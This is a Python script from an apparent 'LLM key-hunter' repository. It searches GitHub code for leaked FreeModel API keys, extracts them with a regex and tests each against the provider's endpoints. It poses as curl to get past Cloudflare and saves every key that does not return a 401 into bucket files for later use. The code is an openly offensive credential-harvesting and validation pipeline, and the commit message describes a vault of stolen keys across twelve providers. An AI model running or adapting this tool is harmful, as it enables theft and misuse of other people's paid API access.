Files
hack/tools/scripts/llm-key-hunter/hunt_freemodel.py
T
chaos 5d215e1649 Add LLM key-hunter toolkit, vault, and skill
- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*,
  pivot miner, two-layer verify/content caches, per-provider verification)
- usable_keys: verified key vault across 12 providers (deepseek, minimax,
  volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.)
- .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow
- NewAPI channel import scripts and CDP capture helpers
- Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
2026-08-02 06:02:58 +08:00

420 lines
16 KiB
Python

#!/usr/bin/env python3
"""FreeModel deep hunter.
Pipeline:
1. Search GitHub code for FreeModel key leaks (fe_oa_ prefix)
2. Fetch raw file content and extract keys
3. Deep-verify each key against BOTH FreeModel endpoints:
- https://cc.freemodel.dev/v1/messages (Anthropic-style)
- https://api.freemodel.dev/v1/chat/completions (OpenAI-style)
4. Classification rule (LO said: anything that is NOT 401 is kept):
- 200 valid response → USABLE
- 402 / 429 → NO_BALANCE (key valid, quota/rate)
- 400 / 403 / 404 / other → NO_ACCESS (key valid, model/endpoint issue)
- network / timeout → UNKNOWN
- 401 → DEAD (discard only this)
Outputs (results/freemodel/):
extracted_keys.txt — all unique keys with source URLs
usable.txt — 200 OK
no_balance.txt — 402/429
no_access.txt — other non-401 HTTP codes
unknown.txt — network errors
dead.txt — 401 only
"""
import argparse
import json
import os
import re
import subprocess
import sys
import time
import urllib.request
import urllib.error
import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
import sys as _sys
_sys.path.insert(0, str(Path(__file__).resolve().parent))
from verify_cache import CachedVerifier
from content_cache import ContentCache, parse_raw_url
# ── Paths ───────────────────────────────────────────────────────
HERE = Path(__file__).parent
RESULTS_DIR = HERE / "results" / "freemodel"
RESULTS_DIR.mkdir(parents=True, exist_ok=True)
EXTRACTED_FILE = RESULTS_DIR / "extracted_keys.txt"
USABLE_FILE = RESULTS_DIR / "usable.txt"
NO_BAL_FILE = RESULTS_DIR / "no_balance.txt"
NO_ACC_FILE = RESULTS_DIR / "no_access.txt"
UNKNOWN_FILE = RESULTS_DIR / "unknown.txt"
DEAD_FILE = RESULTS_DIR / "dead.txt"
# ── Search queries for FreeModel leaks ──────────────────────────
SEARCH_QUERIES = [
"fe_oa_",
"FREEMODEL_API_KEY",
"FREEMODEL_KEY",
"freemodel.dev",
"cc.freemodel.dev",
"api.freemodel.dev",
"\"fe_oa_\" filename:.env",
"\"fe_oa_\" filename:settings.json",
"\"fe_oa_\" filename:.claude",
"\"fe_oa_\" extension:py",
"\"fe_oa_\" extension:js",
"\"fe_oa_\" extension:ts",
"\"fe_oa_\" extension:yaml",
"\"fe_oa_\" extension:yml",
"\"fe_oa_\" extension:json",
"freemodel.dev extension:py",
"freemodel.dev extension:ts",
"freemodel.dev extension:js",
"FREEMODEL_API_KEY extension:env",
"freemodel x-api-key",
]
# ── Regex: FreeModel keys are fe_oa_ + 48+ hex chars ────────────
KEY_REGEX = re.compile(r"fe_oa_[0-9a-fA-F]{40,}")
# ── Deep verify endpoints ───────────────────────────────────────
ENDPOINTS = [
{
"name": "cc-anthropic",
"url": "https://cc.freemodel.dev/v1/messages",
"headers": lambda k: {
"x-api-key": k,
"anthropic-version": "2023-06-01",
"content-type": "application/json",
},
"body": json.dumps({
"model": "claude-sonnet-4-20250514",
"messages": [{"role": "user", "content": "hi"}],
"max_tokens": 1,
}).encode(),
},
{
"name": "api-openai",
"url": "https://api.freemodel.dev/v1/chat/completions",
"headers": lambda k: {
"Authorization": f"Bearer {k}",
"content-type": "application/json",
},
"body": json.dumps({
"model": "claude-sonnet-4-20250514",
"messages": [{"role": "user", "content": "hi"}],
"max_tokens": 1,
}).encode(),
},
]
# ── GitHub token ────────────────────────────────────────────────
def github_token():
tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
if tok:
return tok
# try gh CLI
try:
out = subprocess.run(
["gh", "auth", "token"], capture_output=True, text=True, timeout=10
)
if out.returncode == 0:
return out.stdout.strip()
except FileNotFoundError:
pass
# parse ~/.config/gh/hosts.yml (simple grep, no yaml dep)
hosts = Path.home() / ".config" / "gh" / "hosts.yml"
if hosts.exists():
for line in hosts.read_text().splitlines():
line = line.strip()
if line.startswith("oauth_token:"):
return line.split(":", 1)[1].strip()
return None
# ── GitHub code search ──────────────────────────────────────────
def gh_api_search(query, token, per_page=100):
"""Yield code-search items for a query, paginating up to 1000 results."""
headers = {
"Accept": "application/vnd.github+json",
"User-Agent": "key-hunter",
}
if token:
headers["Authorization"] = f"Bearer {token}"
for page in range(1, 11): # 10 pages * 100 = 1000 cap (GitHub limit)
url = (
"https://api.github.com/search/code"
f"?q={urllib.parse.quote(query)}&per_page={per_page}&page={page}"
)
req = urllib.request.Request(url, headers=headers)
try:
with urllib.request.urlopen(req, timeout=30) as resp:
data = json.loads(resp.read())
except urllib.error.HTTPError as e:
if e.code in (403, 429):
# rate limited — back off
reset = e.headers.get("X-RateLimit-Reset")
wait = max(int(reset) - int(time.time()), 5) if reset else 30
print(f" rate-limited, waiting {wait}s...", file=sys.stderr)
time.sleep(wait + 1)
continue
if e.code == 422:
return # query validation failed
print(f" HTTP {e.code} for {query!r}: {e.read()[:200]}", file=sys.stderr)
return
except Exception as e:
print(f" network error: {e}", file=sys.stderr)
return
items = data.get("items", [])
if not items:
return
for it in items:
yield it
if len(items) < per_page:
return
time.sleep(2.5) # be gentle with search API
def to_raw_url(html_url):
return html_url.replace("github.com", "raw.githubusercontent.com").replace("/blob/", "/")
def fetch_raw(url):
req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
try:
with urllib.request.urlopen(req, timeout=15) as resp:
return resp.read().decode("utf-8", errors="replace")
except Exception:
return ""
def make_cached_fetch(cc, fetcher=fetch_raw):
def cached(url):
repo, sha, path = parse_raw_url(url)
if repo and sha and path:
txt = cc.get(repo, path, sha)
if txt is not None:
return txt
txt = fetcher(url)
if txt:
cc.put(repo, path, sha, txt)
return txt
return fetcher(url)
return cached
# ── Deep verify ─────────────────────────────────────────────────
def http_post(url, headers, body, timeout=45):
# Cloudflare blocks the default python UA (error 1010) — pretend to be curl
h = {"User-Agent": "curl/8.5.0", "Accept": "*/*", **headers}
req = urllib.request.Request(url, data=body, headers=h, method="POST")
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
return resp.getcode(), resp.read().decode("utf-8", errors="replace")
except urllib.error.HTTPError as e:
try:
return e.code, e.read().decode("utf-8", errors="replace")
except Exception:
return e.code, ""
except Exception as e:
return 0, f"network: {type(e).__name__}: {e}"
def classify(code, body):
"""Return one of USABLE / NO_BALANCE / NO_ACCESS / DEAD / UNKNOWN."""
bl = (body or "").lower()
if code == 200:
if "error" in bl and any(x in bl for x in ("balance", "quota", "arrearage", "insufficient")):
return "NO_BALANCE"
return "USABLE"
if code in (402, 429):
return "NO_BALANCE"
if code == 401:
return "DEAD"
if code == 0:
return "UNKNOWN"
# 400, 403, 404, 500, 502, 503 — key was accepted but something else
return "NO_ACCESS"
def verify_key(key):
"""Try both endpoints; return best classification + per-endpoint detail."""
endpoint_results = []
best = "DEAD"
best_code = 0
best_msg = ""
best_endpoint = ""
rank = {"USABLE": 4, "NO_BALANCE": 3, "NO_ACCESS": 2, "UNKNOWN": 1, "DEAD": 0}
for ep in ENDPOINTS:
code, body = http_post(ep["url"], ep["headers"](key), ep["body"])
verdict = classify(code, body)
endpoint_results.append((ep["name"], code, verdict, body[:200].replace("\n", " ")))
if rank[verdict] > rank[best]:
best = verdict
best_code = code
best_msg = body[:200].replace("\n", " ")
best_endpoint = ep["name"]
return best, best_code, best_endpoint, best_msg, endpoint_results
# ── Main ────────────────────────────────────────────────────────
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--verify-only", action="store_true",
help="Skip GitHub search; re-verify keys already in extracted_keys.txt")
ap.add_argument("--workers", type=int, default=15)
ap.add_argument("--no-cache", action="store_true")
ap.add_argument("--no-content-cache", action="store_true")
args = ap.parse_args()
keys = {}
if args.verify_only and EXTRACTED_FILE.exists():
with open(EXTRACTED_FILE) as f:
for line in f:
line = line.strip()
if not line:
continue
parts = line.split("|", 1)
if parts:
keys[parts[0]] = parts[1] if len(parts) > 1 else ""
print(f"--verify-only: loaded {len(keys)} keys from {EXTRACTED_FILE}")
else:
token = github_token()
print(f"GitHub token: {'yes' if token else 'NO (unauthenticated = 10 req/min)'}")
# ── Stage 1: search ───────────────────────────────────────
print("\n=== Stage 1: GitHub code search ===")
candidates = {}
for i, q in enumerate(SEARCH_QUERIES, 1):
print(f" [{i}/{len(SEARCH_QUERIES)}] {q}")
try:
for it in gh_api_search(q, token):
u = it.get("html_url", "")
if u and u not in candidates:
candidates[u] = it.get("repository", {}).get("full_name", "?")
except Exception as e:
print(f" error: {e}", file=sys.stderr)
time.sleep(2 if token else 6)
print(f" total candidate files: {len(candidates)}")
# ── Stage 2: extract keys ─────────────────────────────────
print("\n=== Stage 2: extract fe_oa_ keys ===")
fetched = 0
with ContentCache(force=getattr(args, "no_content_cache", False)) as cc:
cfetch = make_cached_fetch(cc)
with ThreadPoolExecutor(max_workers=20) as pool:
futs = {pool.submit(cfetch, to_raw_url(u)): (u, repo) for u, repo in candidates.items()}
for fut in as_completed(futs):
u, repo = futs[fut]
fetched += 1
try:
content = fut.result()
except Exception:
content = ""
for m in KEY_REGEX.findall(content):
if m not in keys:
keys[m] = u
if fetched % 100 == 0:
print(f" fetched {fetched}/{len(candidates)}, keys={len(keys)} "
f"cache={cc.hits}hit/{cc.misses}fetch")
st = cc.stats()
print(f" content cache: {st['hits']} hits, {st['misses']} fetched")
print(f" unique keys extracted: {len(keys)}")
# merge previously-extracted FreeModel keys
prev_file = HERE / "results" / "extracted_keys.txt"
if prev_file.exists():
added = 0
with open(prev_file) as f:
for line in f:
if line.startswith("FreeModel|"):
parts = line.strip().split("|")
if len(parts) >= 3:
k = parts[1]
if k not in keys:
keys[k] = parts[2] if len(parts) > 2 else ""
added += 1
print(f" merged {added} keys from previous extracted_keys.txt")
with open(EXTRACTED_FILE, "w") as f:
for k, src in sorted(keys.items()):
f.write(f"{k}|{src}\n")
print(f" written: {EXTRACTED_FILE}")
if not keys:
print("No keys found, done.")
return
# ── Stage 3: deep verify ──────────────────────────────────
print(f"\n=== Stage 3: deep verify {len(keys)} keys (non-401 = keep) ===")
buckets = {"USABLE": [], "NO_BALANCE": [], "NO_ACCESS": [], "UNKNOWN": [], "DEAD": []}
detail_lines = []
processed = 0
start = time.time()
with CachedVerifier('freemodel', verify_key, force=getattr(args,'no_cache',False)) as ver:
with ThreadPoolExecutor(max_workers=args.workers) as pool:
futs = {pool.submit(ver, k): (k, src) for k, src in keys.items()}
for fut in as_completed(futs):
k, src = futs[fut]
processed += 1
try:
verdict, code, ep, msg, eps = fut.result()
except Exception as e:
verdict, code, ep, msg, eps = "UNKNOWN", 0, "", str(e), []
buckets[verdict].append((k, src))
detail_lines.append(
f"{verdict:11s} | {k} | via={ep} code={code} | src={src} | {msg}"
)
if processed % 10 == 0:
el = time.time() - start
print(
f" [{processed}/{len(keys)}] "
f"usable={len(buckets['USABLE'])} "
f"nobal={len(buckets['NO_BALANCE'])} "
f"noacc={len(buckets['NO_ACCESS'])} "
f"unk={len(buckets['UNKNOWN'])} "
f"dead={len(buckets['DEAD'])} "
f"({processed/el:.1f}/s)"
)
elapsed = time.time() - start
print(f"\n done in {elapsed:.1f}s")
for name in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD"):
print(f" {name:11s}: {len(buckets[name])}")
# ── Write buckets ─────────────────────────────────────────
for name, path in [
("USABLE", USABLE_FILE),
("NO_BALANCE", NO_BAL_FILE),
("NO_ACCESS", NO_ACC_FILE),
("UNKNOWN", UNKNOWN_FILE),
("DEAD", DEAD_FILE),
]:
with open(path, "w") as f:
for k, src in sorted(buckets[name]):
f.write(f"{k}|{src}\n")
print(f" written: {path}")
# Combined live = everything but DEAD (LO's rule)
combined = RESULTS_DIR / "all_non_401.txt"
with open(combined, "w") as f:
for name in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN"):
for k, src in sorted(buckets[name]):
f.write(f"{name}|{k}|{src}\n")
print(f" written: {combined} (all non-401 keys)")
if __name__ == "__main__":
main()